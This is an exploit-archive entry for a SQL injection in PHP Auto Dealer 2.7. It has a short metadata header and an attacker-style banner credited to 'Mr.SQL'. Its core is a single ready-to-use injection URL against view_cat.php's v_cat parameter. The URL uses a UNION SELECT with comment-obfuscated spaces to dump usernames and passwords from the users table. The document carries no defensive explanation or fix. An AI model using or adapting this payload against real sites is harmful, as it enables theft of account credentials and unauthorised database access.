PHP Auto Dealer 2.7 (view_cat.php v_cat) SQL Injection Vulnerability

2008-10-07T00:00:00
ID 1337DAY-ID-3851
Type zdt
Reporter Mr.SQL
Modified 2008-10-07T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================================
PHP Auto Dealer 2.7 (view_cat.php v_cat) SQL Injection Vulnerability
====================================================================



###############################################################
##
## Remote SQL Injection Vulnerability
##
## PHP Auto Dealer 2.7 ( view_cat.php v_cat )
##
## http://selectdevelopment.com/
###############################################################
###############################################################
## AuTh0r : Mr.SQL
########################
########################
##
## -[[: Exploite :]]-
##
## www.TraGeT./view_cat.php?v_cat=-1/**/UNION/**/SELECT/**/CONCAT_WS(0x3a,username,password)MrSQL/**/FROM/**/users/**/limit+1,1--
##
########################
########################





#  0day.today [2018-01-05]  #